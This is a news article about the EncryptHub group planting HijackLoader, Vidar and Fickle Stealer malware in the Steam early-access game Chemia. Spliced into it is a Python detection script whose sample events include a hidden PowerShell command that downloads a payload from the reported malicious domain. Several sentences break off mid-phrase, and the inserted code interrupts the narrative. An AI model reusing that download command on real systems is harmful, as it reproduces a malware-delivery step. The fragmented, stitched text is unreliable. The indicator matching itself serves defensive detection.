Steam Users Beware: Malware Hidden in Popular Game Targets Gamers Worldwide

A Silent Attack Hidden in a Game Millions Trust

Steam, the

Malware Hidden Behind a Game: How the Attack Unfolded

The threat began when EncryptHub inserted a malware loader, HijackLoader (CVKRUTNP.exe), into the game Chemia, currently listed as early access on Steam. This loader immediately established persistence on infected machines and downloaded another malicious program known as Vidar infostealer (v9d9d.exe). The attackers cleverly embedded the malware’s command-and-control (C2) server details in a Telegram channel, allowing them to stay off traditional detection radars.

Just three hours after the initial malware was deployed, a second payload called Fickle Stealer was injected into the game via a DLL file named cclib.dll. This second-stage malware was activated using PowerShell scripts, which fetched the primary payload from a compromised domain (soft-gets[.]com). Fickle Stealer’s function was clear — it was built to scrape sensitive data from web browsers, including passwords, auto-fill data, cookies, and even cryptocurrency wallet information.
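As an added defender-side example (not code from the report or from any party named in it), the following Python triage routine checks process-creation records against the file names and domain quoted above; the event shape, paths and command lines are constructed sample data, not captured telemetry.

```python
# Indicators named in the report; the defanged domain is refanged for matching
IOC_FILES = {"cvkrutnp.exe", "v9d9d.exe", "cclib.dll"}
IOC_DOMAIN = "soft-gets[.]com".replace("[.]", ".")

GAME_EXE = r"C:\Program Files (x86)\Steam\steamapps\common\Chemia\Chemia.exe"

# Constructed sample events in a Sysmon-like shape (assumed layout, not real logs)
SAMPLE_EVENTS = [
    {"pid": 4120, "image": GAME_EXE,
     "parent": r"C:\Program Files (x86)\Steam\steam.exe", "cmdline": "Chemia.exe"},
    {"pid": 4188, "image": r"C:\Users\alice\AppData\Local\Temp\CVKRUTNP.exe",
     "parent": GAME_EXE, "cmdline": "CVKRUTNP.exe"},
    {"pid": 4201, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": GAME_EXE,
     "cmdline": 'powershell.exe -w hidden -c "iwr http://soft-gets.com/payload '
                '-OutFile $env:TEMP\\v9d9d.exe"'},
    {"pid": 4300, "image": r"C:\Windows\System32\notepad.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "notepad.exe"},
]


def triage(events):
    """Return (pid, image name, reasons) for each event matching the report's indicators."""
    findings = []
    for ev in events:
        name = ev["image"].rsplit("\\", 1)[-1].lower()
        cmd = ev["cmdline"].lower()
        reasons = []
        # Loader / stealer binaries and the injected DLL, by name or on a command line
        if name in IOC_FILES or any(f in cmd for f in IOC_FILES):
            reasons.append("known loader/stealer file name")
        # Download from the domain the PowerShell stage fetched Fickle Stealer from
        if IOC_DOMAIN in cmd:
            reasons.append("download from reported C2 domain")
        # A game process launching PowerShell is itself worth a look
        if name == "powershell.exe" and ev["parent"].lower().endswith("chemia.exe"):
            reasons.append("PowerShell spawned by game process")
        if reasons:
            findings.append((ev["pid"], name, reasons))
    return findings


if __name__ == "__main__":
    for pid, name, reasons in triage(SAMPLE_EVENTS):
        print(f"pid {pid} ({name}): {', '.join(reasons)}")
```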

EncryptHub isn’t new to this game. The group has previously executed a global spear-phishing campaign that compromised more than 600 organizations. Despite their criminal actions, they remain a strange anomaly in the cybercrime space — they have also been linked to responsible disclosures of zero-day vulnerabilities to Microsoft. This dual nature makes them unpredictable and more dangerous.

The malware was particularly stealthy, affecting only background processes and leaving the game’s performance untouched. This means gamers playing Chemia had no idea they were infected. Researchers believe there may have been an insider involved, as it’s still unclear how the malicious files were embedded in the game’s build. So far, the game developer, Aether Forge Studios, and Steam’s parent company Valve have remained silent. The game remains available for download, and users are strongly advised to avoid it until a verified clean version is released.

This incident marks the third time in 2025 that malware has been found in a Steam-hosted game, following Sniper: Phantom’s Resolution in March and PirateFi in February. All affected titles were early access games — a pattern that suggests Steam’s review process for unreleased content might be dangerously lax.

What Undercode Says:

Exploiting Platform Trust

EncryptHub’s tactic wasn’t just technical — it was psychological. By injecting malware into a legitimate-looking game on Steam, they exploited a fundamental layer of trust. Gamers tend to assume that anything available on a platform like Steam has been vetted and is safe. This assumption gives threat actors an easy pass, especially with early access titles that might skip rigorous security screening.

Weaponizing Early Access Titles

Early access games offer hackers the perfect Trojan horse. These unfinished titles often receive less scrutiny, both from Steam moderators and from players. With gamers eager to test out new indie experiences, attackers can quietly blend malware into the code without raising suspicion. Chemia, like Sniper: Phantom’s Resolution and PirateFi before it, exemplifies how early access status can be weaponized.

Advanced Persistence Techniques

EncryptHub used HijackLoader to create a foothold on users’ systems, with capabilities designed to maintain persistence even after reboots. This level of sophistication indicates an attacker well-versed in malware delivery pipelines, capable of bypassing standard antivirus protections. By layering loaders with secondary payloads like Vidar and Fickle Stealer, the group ensured a more robust infection cycle.

Telegram-Based C2: A Dangerous Trend

Using Telegram for command-and-control communications is becoming increasingly common among threat actors. It’s encrypted, widespread, and hard to shut down. By hiding C2 details in a Telegram channel, EncryptHub avoids exposing IP addresses or domains that defenders could block. This makes attribution and mitigation significantly more difficult.

A Suspicious Silence from Developers

One glaring issue is the silence from both Aether Forge Studios and Valve. With the game still live and potentially dangerous, their lack of public comment is not just irresponsible — it’s dangerous. Whether this was an internal compromise, a hijacked account, or outright negligence, the absence of transparency leaves users vulnerable.

When Malware Doesn’t Affect Performance

Gamers often rely on performance issues as a sign of malware. But EncryptHub’s stealth strategy proves that malware can run quietly in the background while leaving the game unaffected. This invisibility boosts the malware’s dwell time, allowing attackers to harvest more data without triggering any alarms.

History Repeats Itself on Steam

With three malware incidents in less than a year, Steam’s early access catalog is quickly becoming a threat vector. Valve may need to reconsider its review protocols, especially for indie titles from lesser-known developers. Without enhanced safeguards, this won’t be the last time gamers get caught off guard.

Cross-Campaign Infrastructure Reuse

The use of similar tools, like Fickle Stealer, across past campaigns and this one hints at EncryptHub’s reuse of infrastructure. This behavior is a double-edged sword — it helps researchers track patterns but also shows how mature and scalable their operations have become.

Insider Threats in Game Development

One unsettling possibility is insider involvement. If EncryptHub had access to the game’s backend, either through collusion or a compromised developer account, it raises serious questions about internal security practices in indie studios. Vetting developers, contractors, and collaborators must become a higher priority.

A Warning for All Gamers

This isn’t just about one game.

🔍 Fact Checker Results:

✅ EncryptHub did use HijackLoader and Fickle Stealer in
✅ The malware was retrieved from a Telegram channel and used PowerShell loaders
❌ No public response has yet been issued by Aether Forge Studios or Valve

📊 Prediction:

🎮 Expect tighter Steam controls on early access games within the next six months
🔒 Security audits for indie developers will become more common after public pressure
🧠 More threat actors may follow EncryptHub’s blueprint, hiding malware in gaming platforms due to their vast, trusting user base

References:

Reported By: www.bleepingcomputer.com